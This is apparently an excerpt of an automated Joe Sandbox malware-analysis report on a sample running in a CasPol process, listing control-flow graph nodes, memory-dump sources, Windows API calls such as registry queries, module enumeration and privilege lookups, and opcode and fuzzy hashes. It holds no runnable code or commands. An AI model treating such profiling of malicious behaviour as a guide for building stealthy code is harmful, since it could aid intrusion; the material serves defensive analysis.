1658->1657 1659->1633 1666 20654cec-20654cef 1659->1666 1660->1659 1661->1652 1661->1669 1662->1663 1671 20654d39-20654d3c 1662->1671 1663->1629 1670 20654d2f 1663->1670 1666->1655 1668 20654cfc-20654cff 1666->1668 1667->1668 1668->1637 1668->1649 1673 20654c64-20654c6a 1669->1673 1674 20654c8b-20654c8e 1669->1674 1670->1662 1675 20654d3e-20654d44 1671->1675 1676 20654d4b-20654d4d 1671->1676 1673->1629 1679 20654c70-20654c73 1673->1679 1674->1630 1674->1643 1675->1629 1680 20654d46 1675->1680 1681 20654d54-20654d57 1676->1681 1682 20654d4f 1676->1682 1684 20654df2-20654e11 1677->1684 1685 20654e18-20654e24 1677->1685 1678->1677 1679->1629 1683 20654c79-20654c86 1679->1683 1680->1676 1681->1619 1686 20654d5d-20654d67 1681->1686 1682->1681 1683->1674 1684->1685 1687 20654e26-20654e5d 1685->1687 1688 20654e60-20654e64 1685->1688 1687->1688 1695->1558 1696->1558 1697->1558 1698->1558 1699->1577 1700->1577 1701->1598 1702->1598
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $,Q(s$,Q(s$,Q(s
                                                                                                                                    • API String ID: 0-1591512856
                                                                                                                                    • Opcode ID: 1b1bf69add01cc503b702c302ad971d96cf5cbc0a85fda5a6111f14bdf238a1e
                                                                                                                                    • Instruction ID: 85e9a2496707aef5e8b09b6e793b4c30543d1ed577aaf0909652146f8d649fe4
                                                                                                                                    • Opcode Fuzzy Hash: 1b1bf69add01cc503b702c302ad971d96cf5cbc0a85fda5a6111f14bdf238a1e
                                                                                                                                    • Instruction Fuzzy Hash: F681F775B043559FDB05DBB88850BAE7FF6EF85210B0980AAD501DF392DA34DD05C7A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20710AF0 Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2179 20710af0-20710b3b LdrInitializeThunk 2183 20710b42-20710b4e 2179->2183 2184 20710d94-20710da7 2183->2184 2185 20710b54-20710b5d 2183->2185 2188 20710dce-20710dd2 2184->2188 2186 20710b63-20710b78 2185->2186 2187 20710dc9 2185->2187 2193 20710b92-20710bad 2186->2193 2194 20710b7a-20710b8d 2186->2194 2187->2188 2189 20710dd4 2188->2189 2190 20710ddd 2188->2190 2189->2190 2192 20710dde 2190->2192 2192->2192 2201 20710bbb 2193->2201 2202 20710baf-20710bb9 2193->2202 2195 20710d68-20710d6c 2194->2195 2197 20710d77 2195->2197 2198 20710d6e 2195->2198 2197->2184 2198->2197 2203 20710bc0-20710bc2 2201->2203 2202->2203 2204 20710bc4-20710bd7 2203->2204 2205 20710bdc-20710c74 2203->2205 2204->2195 2223 20710c82 2205->2223 2224 20710c76-20710c80 2205->2224 2225 20710c87-20710c89 2223->2225 2224->2225 2226 20710c8b-20710c8d 2225->2226 2227 20710cdf-20710d23 2225->2227 2228 20710c9b 2226->2228 2229 20710c8f-20710c99 2226->2229 2242 20710d33-20710d66 2227->2242 2243 20710d25-20710d2c 2227->2243 2231 20710ca0-20710ca2 2228->2231 2229->2231 2231->2227 2232 20710ca4-20710cdd 2231->2232 2232->2227 2242->2195 2243->2242
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425915830.0000000020710000.00000040.00000800.00020000.00000000.sdmp, Offset: 20710000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20710000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4ecaab8dd458b09837a033933291e6c93d19389eaa79848c0be2e87c2d76375f
                                                                                                                                    • Instruction ID: 58c668c6692012b0a0ef15e083db5e93e991920917a07ad33fea3989b6b9cebb
                                                                                                                                    • Opcode Fuzzy Hash: 4ecaab8dd458b09837a033933291e6c93d19389eaa79848c0be2e87c2d76375f
                                                                                                                                    • Instruction Fuzzy Hash: FD712874A10219DFDB14DFF4D494BAEBBF2AF88354F148929D405A7390DB78A981CBD0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20713454 Relevance: 1.7, APIs: 1, Instructions: 158libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2246 20713454-207134c2 2255 207134c9-207134e0 LdrInitializeThunk 2246->2255 2256 207134e6-20713504 2255->2256 2257 2071362d-20713652 2255->2257 2256->2257 2260 2071350a-20713524 2256->2260 2271 20713657-20713660 2257->2271 2264 20713526-20713528 2260->2264 2265 2071352a 2260->2265 2266 2071352d-20713586 2264->2266 2265->2266 2276 20713588-2071358a 2266->2276 2277 2071358c 2266->2277 2278 2071358f-2071362b 2276->2278 2277->2278 2278->2271
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425915830.0000000020710000.00000040.00000800.00020000.00000000.sdmp, Offset: 20710000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20710000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: d6c45e0654074e65028fb55d1bb96e76a21fb30e4c44da56970d50b5abd19f98
                                                                                                                                    • Instruction ID: 621d989adeed89481a4a307917dd2cb0e2660ca37883216083c7f2b8b77f0fb0
                                                                                                                                    • Opcode Fuzzy Hash: d6c45e0654074e65028fb55d1bb96e76a21fb30e4c44da56970d50b5abd19f98
                                                                                                                                    • Instruction Fuzzy Hash: 9D516374B003059FDB00EBB4D885BAEBBF5BF89240F118569E505DB251EB349949CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01012249 Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2342 1012249-101225d TerminateThread 2343 10122a8-10122f8 call 1012282 call 1000629 2342->2343 2349 1012462-10124ae 2343->2349 2350 10122fe-1012319 2343->2350 2350->2349 2352 101231f-1012323 2350->2352 2352->2349 2353 1012329-101232d 2352->2353 2353->2349 2354 1012333-1012337 2353->2354 2354->2349 2355 101233d-1012341 2354->2355 2355->2349 2356 1012347-101234b 2355->2356 2356->2349 2357 1012351-101235a 2356->2357 2357->2349 2358 1012360-10123c0 2357->2358 2360 10123c1-10123d3 2358->2360 2361 10123d5-1012415 2360->2361 2362 101242a-101245d 2360->2362 2364 10124b8-10124bf 2361->2364 2365 101241b-101241f 2361->2365 2367 10124c0-101252b 2364->2367 2365->2349 2366 1012421-1012425 2365->2366 2366->2360 2369 101252d-101252f 2367->2369
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88393440326.0000000001000000.00000040.00000400.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1000000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: TerminateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1852365436-0
                                                                                                                                    • Opcode ID: 667d45ddbeb10fbdd8bb90b06c52de139d542437a4b97d2fc9b406d562da541a
                                                                                                                                    • Instruction ID: bc13d510c3a060e415e979828420e99e101cdf0ee28af06304acd8111db677f6
                                                                                                                                    • Opcode Fuzzy Hash: 667d45ddbeb10fbdd8bb90b06c52de139d542437a4b97d2fc9b406d562da541a
                                                                                                                                    • Instruction Fuzzy Hash: 82313D306443059FDBA58A2C95A47FB33F6AFA2365F74C2A5D8C54F1AACB3988C5C601
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA519 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2445 1d8aa519-1d8aa5a5 2449 1d8aa5aa-1d8aa5c1 2445->2449 2450 1d8aa5a7 2445->2450 2452 1d8aa603-1d8aa608 2449->2452 2453 1d8aa5c3-1d8aa5d6 RegOpenKeyExW 2449->2453 2450->2449 2452->2453 2454 1d8aa60a-1d8aa60f 2453->2454 2455 1d8aa5d8-1d8aa600 2453->2455 2454->2455
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 1D8AA5C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                    • Opcode ID: 4b0ccb5d9ab2354d2078d3f1dd67049279c25fcf59bc40e43323a6d4ddc46346
                                                                                                                                    • Instruction ID: fb6044b05092051feff0e86ee92cef368391ab55d359f4e3221dc08f6512507b
                                                                                                                                    • Opcode Fuzzy Hash: 4b0ccb5d9ab2354d2078d3f1dd67049279c25fcf59bc40e43323a6d4ddc46346
                                                                                                                                    • Instruction Fuzzy Hash: FA318472508384AFE7128F11DC85F67FFBCEF46210F08859BF9858B152D264A549CB76
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA611 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2476 1d8aa611-1d8aa68f 2479 1d8aa691 2476->2479 2480 1d8aa694-1d8aa69d 2476->2480 2479->2480 2481 1d8aa69f 2480->2481 2482 1d8aa6a2-1d8aa6a8 2480->2482 2481->2482 2483 1d8aa6aa 2482->2483 2484 1d8aa6ad-1d8aa6c4 2482->2484 2483->2484 2486 1d8aa6fb-1d8aa700 2484->2486 2487 1d8aa6c6-1d8aa6d9 RegQueryValueExW 2484->2487 2486->2487 2488 1d8aa6db-1d8aa6f8 2487->2488 2489 1d8aa702-1d8aa707 2487->2489 2489->2488
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AA6CC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                    • Opcode ID: 887e66add76b01b9d880dbad5a0ed293c16deb034adac48eac9c79657d583be8
                                                                                                                                    • Instruction ID: a451f451e74f217236c747e4cd1efdb4fcf052cd459c63e1ff995949b16477bc
                                                                                                                                    • Opcode Fuzzy Hash: 887e66add76b01b9d880dbad5a0ed293c16deb034adac48eac9c79657d583be8
                                                                                                                                    • Instruction Fuzzy Hash: 713193765097809FE712CF21DC85F63FFB8EF46610F08849AE985CB153D264E949CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20710A84 Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425915830.0000000020710000.00000040.00000800.00020000.00000000.sdmp, Offset: 20710000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20710000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 591e82ce99db982b18747abd0a7c589946150de2a9359f6ddf44315ea0c23f48
                                                                                                                                    • Instruction ID: 0151ce329d971ef610a0f487c2c3771860e3d05ff139b93927eae547f3fbcabb
                                                                                                                                    • Opcode Fuzzy Hash: 591e82ce99db982b18747abd0a7c589946150de2a9359f6ddf44315ea0c23f48
                                                                                                                                    • Instruction Fuzzy Hash: 6A31B070A15349DFD706DBB4C898B9EBFB1AF46304F1584AAD440EB292DB349C85CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AACEC Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AAD86
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumModulesProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1082081703-0
                                                                                                                                    • Opcode ID: c130303d21cfd2447462c342532adb5130b94a6f61cda8ae81d283480defc273
                                                                                                                                    • Instruction ID: cdee07fac826544b7a108032062451e151eb7b3aa519eb8db4c62be07580c3d4
                                                                                                                                    • Opcode Fuzzy Hash: c130303d21cfd2447462c342532adb5130b94a6f61cda8ae81d283480defc273
                                                                                                                                    • Instruction Fuzzy Hash: 4921D8725097806FE7128F61DC85F56FFB8EF46320F08849BE985DF193C2659449CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA120 Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000EA8,?,?), ref: 1D8AA1C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2029273394-0
                                                                                                                                    • Opcode ID: e68abd892f3e852c3c8e489bbb7292bff11462718e2c561763f050bf4afc5d5f
                                                                                                                                    • Instruction ID: 8790ac6fffe3628e614bffe81d99bc052c3a77daafadf30e7f673fa99b443436
                                                                                                                                    • Opcode Fuzzy Hash: e68abd892f3e852c3c8e489bbb7292bff11462718e2c561763f050bf4afc5d5f
                                                                                                                                    • Instruction Fuzzy Hash: DC31D37140D3C06FD3128B258C65B62BFB4EF47610F1985DBD9C48F193D229A909DBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AADE5 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32GetModuleInformation.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AAE76
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InformationModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3425974696-0
                                                                                                                                    • Opcode ID: 4cf5dc6cdd27c38ad6b1a98dc8b6724d07ffee8351a1d7a56f566c806c7de4e2
                                                                                                                                    • Instruction ID: 41678eb15fc7a939f79fcc5f789f7668eadba5848850afe0c103148890511f33
                                                                                                                                    • Opcode Fuzzy Hash: 4cf5dc6cdd27c38ad6b1a98dc8b6724d07ffee8351a1d7a56f566c806c7de4e2
                                                                                                                                    • Instruction Fuzzy Hash: B321A371505380AFE711CF11DC45F67FFB8EF46220F08849AE985DB152D264E849CB72
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAEDC Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32GetModuleBaseNameW.KERNEL32(?,00000EA8,?,?), ref: 1D8AAF82
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BaseModuleName
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 595626670-0
                                                                                                                                    • Opcode ID: 3c06149e3481f4641c157877645ef7831b9946554107cb2ae2f98f17fffae782
                                                                                                                                    • Instruction ID: ecd035aadfe695c78e7b342455b7601d9184e62ccf3d79ee6350958e8ddb58cd
                                                                                                                                    • Opcode Fuzzy Hash: 3c06149e3481f4641c157877645ef7831b9946554107cb2ae2f98f17fffae782
                                                                                                                                    • Instruction Fuzzy Hash: 0621B1725093C06FD312CB65CC55B66BFB4EF87210F0984DBD9848F1A3D624A909CBB6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA722 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000EA8,?,?), ref: 1D8AA7BE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                    • Opcode ID: 35e3f610a2cba77e65e4392ad6b80eb9d614f16f2ee19ccf4a12387938310176
                                                                                                                                    • Instruction ID: 86fa742ffcf92a4db755feb071d2d0abc384839953245d99be9377659b6bde10
                                                                                                                                    • Opcode Fuzzy Hash: 35e3f610a2cba77e65e4392ad6b80eb9d614f16f2ee19ccf4a12387938310176
                                                                                                                                    • Instruction Fuzzy Hash: CE2106754093C06FD3138B258C11B62BFB4EF87610F0981DFE9848B6A3D2256919C7B2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8ABE8C Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000EA8), ref: 1D8ABF27
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 5c340a052a91f68141f3a4804f192d2423b314d63b4298e9853a235b1cf63d50
                                                                                                                                    • Instruction ID: 5b16890d01edcf46e42913a540fea1a5043b86966d0e0ee73cd22e8d16b8337d
                                                                                                                                    • Opcode Fuzzy Hash: 5c340a052a91f68141f3a4804f192d2423b314d63b4298e9853a235b1cf63d50
                                                                                                                                    • Instruction Fuzzy Hash: 7421C8715493806FE712CF11DC45F92FFB8DF46720F1844DAFA845F192C2696949CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA54A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 1D8AA5C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                    • Opcode ID: 5ca81705bff95f1d7d6a90031a8a91c8ee6573e48e2fb4dcae99c9f551f4322f
                                                                                                                                    • Instruction ID: 8497515d80e967b12b74656d41706ec7d9f3a2513fdcfcbf68f035a26474368c
                                                                                                                                    • Opcode Fuzzy Hash: 5ca81705bff95f1d7d6a90031a8a91c8ee6573e48e2fb4dcae99c9f551f4322f
                                                                                                                                    • Instruction Fuzzy Hash: C121BB72900304AFF7219F51DC85FABFBBCEF48620F08855AEA458A641D664E508CAB6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA652 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AA6CC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                    • Opcode ID: 5dc46659d5f53abc6935779ddb09185a50e51650feee9565b61088b87be25a39
                                                                                                                                    • Instruction ID: 204347f31edc8c3fe05c5c5cfde0ab85383ba9801ace8f5f39f4d79e8d185627
                                                                                                                                    • Opcode Fuzzy Hash: 5dc46659d5f53abc6935779ddb09185a50e51650feee9565b61088b87be25a39
                                                                                                                                    • Instruction Fuzzy Hash: B8218972600704AFE721CF16DC85FA7F7F8EF44620F08846AE9498B651D664E948CAB2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAE12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32GetModuleInformation.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AAE76
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InformationModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3425974696-0
                                                                                                                                    • Opcode ID: 56e5c950f8e750330e1cc9f375903c07f439be57e1b4c33aa9bf62485f82e279
                                                                                                                                    • Instruction ID: 4e4fd02760465e84af179dc6d055b0d9373b35c47adc3b5967e27a4304305cd2
                                                                                                                                    • Opcode Fuzzy Hash: 56e5c950f8e750330e1cc9f375903c07f439be57e1b4c33aa9bf62485f82e279
                                                                                                                                    • Instruction Fuzzy Hash: 80117C71600704AFE721CF15DC85FA7FBA8EF44620F08C46AED49DB651D674E918CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AB362 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MkParseDisplayName.OLE32(?,00000EA8,?,?), ref: 1D8AB3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DisplayNameParse
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3580041360-0
                                                                                                                                    • Opcode ID: cd68e87f97da244ae7fcb5b014ecc5f39857b0d11e7c7f121a42c0a7b5d619b3
                                                                                                                                    • Instruction ID: 2897ab73b9899267357fed501f9ce2b6a583b98519186fe23da7a2f24bff04d5
                                                                                                                                    • Opcode Fuzzy Hash: cd68e87f97da244ae7fcb5b014ecc5f39857b0d11e7c7f121a42c0a7b5d619b3
                                                                                                                                    • Instruction Fuzzy Hash: 651106725083806FD3118F16DC45F72BFB8EF86620F09819AED488B682D234B919C7B6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA873 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D8AA8E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: f9c4f27007f4dc413c68dd802fb77ca1ad96a4bd1697113b88bc4eb87055ef83
                                                                                                                                    • Instruction ID: 83200b2ab78f1da0551a2560f74d0e49def120b0f36204448efd6138ec942bc4
                                                                                                                                    • Opcode Fuzzy Hash: f9c4f27007f4dc413c68dd802fb77ca1ad96a4bd1697113b88bc4eb87055ef83
                                                                                                                                    • Instruction Fuzzy Hash: 732184726053805FD711CF25DC54B63FFE8EF46620F0884AAED89CF652D225E408CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AB054 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesExW.KERNELBASE(?,?,?), ref: 1D8AB0C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: a8d95167d3e69febefe820fa3bdffd884663e1f5435b35d3195f19488306360f
                                                                                                                                    • Instruction ID: 6b8b095ebc4b1e7c49ff9e6b54721078752f46bc431bb4032e4627dddfce53c6
                                                                                                                                    • Opcode Fuzzy Hash: a8d95167d3e69febefe820fa3bdffd884663e1f5435b35d3195f19488306360f
                                                                                                                                    • Instruction Fuzzy Hash: 0E2193725093809FD712CF25DC55B52FFB4EF46220F0988EAE985CF262D375A858CB62
                                                                                                                                    Uniqueness

